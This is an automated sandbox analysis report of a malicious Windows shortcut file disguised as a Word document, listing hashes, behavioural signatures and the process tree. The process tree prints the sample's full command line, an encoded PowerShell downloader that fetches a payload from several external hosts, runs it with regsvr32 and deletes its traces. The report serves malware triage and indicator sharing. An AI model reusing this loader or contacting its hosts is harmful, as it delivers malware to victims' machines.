Analysis
-
max time kernel
135s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19/11/2024, 11:40
Static task
static1
Behavioral task
behavioral1
Sample
3e5fd9acdab438ffc8b2cce48c91679d3f980d08f9dea47d5e1039d352cd64fb.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3e5fd9acdab438ffc8b2cce48c91679d3f980d08f9dea47d5e1039d352cd64fb.lnk
Resource
win10v2004-20241007-en
General
-
Target
3e5fd9acdab438ffc8b2cce48c91679d3f980d08f9dea47d5e1039d352cd64fb.lnk
-
Size
2KB
-
MD5
2657f1dbcdec15432bba4ed2ce54c990
-
SHA1
01bedae739a1f579472edd32250274bc2e218f9f
-
SHA256
3e5fd9acdab438ffc8b2cce48c91679d3f980d08f9dea47d5e1039d352cd64fb
-
SHA512
a4aecf01593d2efa8e1b9ce9411a41defdf189f32dd27ec1dd745d98ea96c66af5825949725954bb733c90f326c71baf6be645498d3173538c7407e177643e85
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 11 4016 powershell.exe 17 4016 powershell.exe 21 4016 powershell.exe 23 4016 powershell.exe 27 4016 powershell.exe 29 4016 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 4016 powershell.exe 920 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 920 powershell.exe 920 powershell.exe 4016 powershell.exe 4016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4476 wrote to memory of 920 4476 cmd.exe 86 PID 4476 wrote to memory of 920 4476 cmd.exe 86 PID 920 wrote to memory of 4016 920 powershell.exe 87 PID 920 wrote to memory of 4016 920 powershell.exe 87
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\3e5fd9acdab438ffc8b2cce48c91679d3f980d08f9dea47d5e1039d352cd64fb.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1104.docx.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\Admin\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\Admin\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\Admin\AppData\Local\Temp\ezMgZunnfF.ps1"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp\ezMgZunnfF.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD520e4765a5308146fa253abce7ea8b8d4
SHA1dd54af068871de90e4f42ca9585583b096b1e5a9
SHA256cfc1018df0e4bedfcba4f831881263b69957286a53f63f6282a14258fcb64124
SHA512f0153a81d934ebbd76b2939df6e05306374e1419af8f67789d247f0d63610e977311fcec9d4f86d6a8fcd6fe59b5c3c91858967b8025374ef4bd94ab468caad4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
898B
MD53f6b9a3c25a96dac461257368b47ec82
SHA1d14a5d0fd3f7565796ac3dec993c68a77793fa6e
SHA256e1388abcfea4474662917ee606c959651d8d9f54a67b6fd89643d06ec25a0f50
SHA51259803aa3398e6cb5370d3e620c2bd0f12b314561bd3a95676eab8148c447828343b3fb192d58605eb2b1a7959b0c473fac8062743b7d262795baef3868542235